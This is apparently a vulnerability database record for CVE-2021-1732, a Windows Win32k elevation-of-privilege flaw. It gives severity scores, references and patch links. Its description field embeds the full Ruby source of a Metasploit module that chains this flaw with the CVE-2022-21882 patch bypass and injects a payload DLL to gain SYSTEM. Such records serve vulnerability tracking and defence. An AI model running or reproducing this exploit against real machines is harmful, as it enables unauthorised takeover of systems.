            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-1732",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "secure@microsoft.com",
            "id": "CVE-2021-1732",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202102-670",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-1732",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k\u662f\u7f8e\u56fd\u5fae\u8f6f\uff08Microsoft\uff09\u516c\u53f8\u7684\u4e00\u4e2a\u7528\u4e8eWindows\u591a\u7528\u6237\u7ba1\u7406\u7684\u7cfb\u7edf\u6587\u4ef6. \nMicrosoft Win32k \u4e2d\u5b58\u5728\u5b89\u5168\u7279\u5f81\u95ee\u9898\u6f0f\u6d1e\u3002\u4ee5\u4e0b\u4ea7\u54c1\u53ca\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aWindows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019  (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Local\n  Rank = AverageRanking\n\n  include Msf::Post::File\n  include Msf::Post::Windows::Priv\n  include Msf::Post::Windows::Process\n  include Msf::Post::Windows::ReflectiveDLLInjection\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  include Msf::Exploit::Deprecated\n  moved_from \u0027exploit/windows/local/cve_2021_1732_win32k\u0027\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        {\n          \u0027Name\u0027 =\u003e \u0027Win32k ConsoleControl Offset Confusion\u0027,\n          \u0027Description\u0027 =\u003e %q{\n            A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n            NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n            treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n            achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n            This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \n            In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n            is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n            function on a wider range of Windows 10 targets. \n          },\n          \u0027License\u0027 =\u003e MSF_LICENSE,\n          \u0027Author\u0027 =\u003e [\n            # CVE-2021-1732\n            \u0027BITTER APT\u0027, # exploit as used in the wild\n            \u0027JinQuan\u0027, # detailed analysis\n            \u0027MaDongZe\u0027, # detailed analysis\n            \u0027TuXiaoYi\u0027, # detailed analysis\n            \u0027LiHao\u0027, # detailed analysis\n            # CVE-2022-21882\n            \u0027L4ys\u0027, # github poc\n            # both CVEs\n            \u0027KaLendsi\u0027, # github pocs\n            # Metasploit exploit\n            \u0027Spencer McIntyre\u0027 # metasploit module\n          ],\n          \u0027Arch\u0027 =\u003e [ ARCH_X64 ],\n          \u0027Platform\u0027 =\u003e \u0027win\u0027,\n          \u0027SessionTypes\u0027 =\u003e [ \u0027meterpreter\u0027 ],\n          \u0027DefaultOptions\u0027 =\u003e {\n            \u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n          },\n          \u0027Targets\u0027 =\u003e [\n            [ \u0027Windows 10 v1803-21H2 x64\u0027, { \u0027Arch\u0027 =\u003e ARCH_X64 } ]\n          ],\n          \u0027Payload\u0027 =\u003e {\n            \u0027DisableNops\u0027 =\u003e true\n          },\n          \u0027References\u0027 =\u003e [\n            # CVE-2021-1732 references\n            [ \u0027CVE\u0027, \u00272021-1732\u0027 ],\n            [ \u0027URL\u0027, \u0027https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/\u0027 ],\n            [ \u0027URL\u0027, \u0027https://github.com/KaLendsi/CVE-2021-1732-Exploit\u0027 ],\n            [ \u0027URL\u0027, \u0027https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e\u0027 ],\n            [ \u0027URL\u0027, \u0027https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732\u0027 ],\n            # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n            [ \u0027URL\u0027, \u0027https://www.fuzzysecurity.com/tutorials/expDev/22.html\u0027 ],\n            [ \u0027URL\u0027, \u0027https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm\u0027 ],\n            [ \u0027URL\u0027, \u0027https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html\u0027 ],\n            [ \u0027URL\u0027, \u0027https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html\u0027 ],\n            # CVE-2022-21882 references\n            [ \u0027CVE\u0027, \u00272022-21882\u0027 ],\n            [ \u0027URL\u0027, \u0027https://github.com/L4ys/CVE-2022-21882\u0027 ],\n            [ \u0027URL\u0027, \u0027https://github.com/KaLendsi/CVE-2022-21882\u0027 ]\n          ],\n          \u0027DisclosureDate\u0027 =\u003e \u00272021-02-09\u0027, # CVE-2021-1732 disclosure date\n          \u0027DefaultTarget\u0027 =\u003e 0,\n          \u0027Notes\u0027 =\u003e {\n            \u0027Stability\u0027 =\u003e [ CRASH_OS_RESTARTS, ],\n            \u0027Reliability\u0027 =\u003e [ REPEATABLE_SESSION, ],\n            \u0027SideEffects\u0027 =\u003e []\n          }\n        }\n      )\n    )\n  end\n\n  def check\n    sysinfo_value = sysinfo[\u0027OS\u0027]\n\n    if sysinfo_value !~ /windows/i\n      # Non-Windows systems are definitely not affected. \n      return Exploit::CheckCode::Safe\n    end\n\n    build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n    vprint_status(\"Windows Build Number = #{build_num}\")\n\n    unless sysinfo_value =~ /10/ \u0026\u0026 (build_num \u003e= 17134 \u0026\u0026 build_num \u003c= 19044)\n      print_error(\u0027The exploit only supports Windows 10 versions 1803 - 21H2\u0027)\n      return CheckCode::Safe\n    end\n\n    CheckCode::Appears\n  end\n\n  def exploit\n    if is_system?\n      fail_with(Failure::None, \u0027Session is already elevated\u0027)\n    end\n\n    if sysinfo[\u0027Architecture\u0027] == ARCH_X64 \u0026\u0026 session.arch == ARCH_X86\n      fail_with(Failure::NoTarget, \u0027Running against WOW64 is not supported\u0027)\n    elsif sysinfo[\u0027Architecture\u0027] == ARCH_X64 \u0026\u0026 target.arch.first == ARCH_X86\n      fail_with(Failure::NoTarget, \u0027Session host is x64, but the target is specified as x86\u0027)\n    elsif sysinfo[\u0027Architecture\u0027] == ARCH_X86 \u0026\u0026 target.arch.first == ARCH_X64\n      fail_with(Failure::NoTarget, \u0027Session host is x86, but the target is specified as x64\u0027)\n    end\n\n    encoded_payload = payload.encoded\n    execute_dll(\n      ::File.join(Msf::Config.data_directory, \u0027exploits\u0027, \u0027CVE-2022-21882\u0027, \u0027CVE-2022-21882.x64.dll\u0027),\n      [encoded_payload.length].pack(\u0027I\u003c\u0027) + encoded_payload\n    )\n\n    print_good(\u0027Exploit finished, wait for (hopefully privileged) payload execution to complete.\u0027)\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "db": "PACKETSTORM",
        "id": "166169"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-1732",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166169",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161880",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162982",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2021030124",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-1732",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "db": "PACKETSTORM",
        "id": "166169"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "id": "VAR-202102-0786",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2024-07-26T22:57:29.884000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Microsoft Windows Win32k Fixing measures for security feature vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=142782"
      },
      {
        "title": "Windows Privilege Escalation\nScreenshots:",
        "trust": 0.1,
        "url": "https://github.com/exploitblizzard/windows-privilege-escalation-cve-2021-1732 "
      },
      {
        "title": "Windows Privilege Escalation",
        "trust": 0.1,
        "url": "https://github.com/asepsaepdin/cve-2021-1732 "
      },
      {
        "title": "CVE-2021-1732",
        "trust": 0.1,
        "url": "https://github.com/beneficialcode/cve-2021-1732 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/161880/win32k-consolecontrol-offset-confusion.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/166169/win32k-consolecontrol-offset-confusion-privilege-escalation.html"
      },
      {
        "trust": 1.6,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2021-1732"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1732"
      },
      {
        "trust": 0.6,
        "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2021030124"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162982/windows-win32k-elevation-of-privilege-vulnerability.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/microsoft-windows-vulnerabilities-of-february-2021-34535"
      },
      {
        "trust": 0.1,
        "url": "https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-1732\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.fuzzysecurity.com/tutorials/expdev/22.html\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/l4ys/cve-2022-21882\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/kalendsi/cve-2022-21882\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/kalendsi/cve-2021-1732-exploit\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21882"
      },
      {
        "trust": 0.1,
        "url": "https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html\u0027"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166169"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "db": "PACKETSTORM",
        "id": "166169"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-02-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "date": "2022-02-28T16:49:05",
        "db": "PACKETSTORM",
        "id": "166169"
      },
      {
        "date": "2021-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "date": "2021-02-25T23:15:13.930000",
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-12-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-1732"
      },
      {
        "date": "2022-03-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      },
      {
        "date": "2024-07-25T17:53:12.640000",
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Win32k Security feature vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "security feature problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2021-1732

Vulnerability from cvelistv5

CISA Known exploited vulnerability

Data from the Known Exploited Vulnerabilities Catalog

fkie_cve-2021-1732

Vulnerability from fkie_nvd

gsd-2021-1732

Vulnerability from gsd

ghsa-gvwr-5hrc-2gr5

Vulnerability from github

var-202102-0786

Vulnerability from variot

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

Tags

Sightings

Nomenclature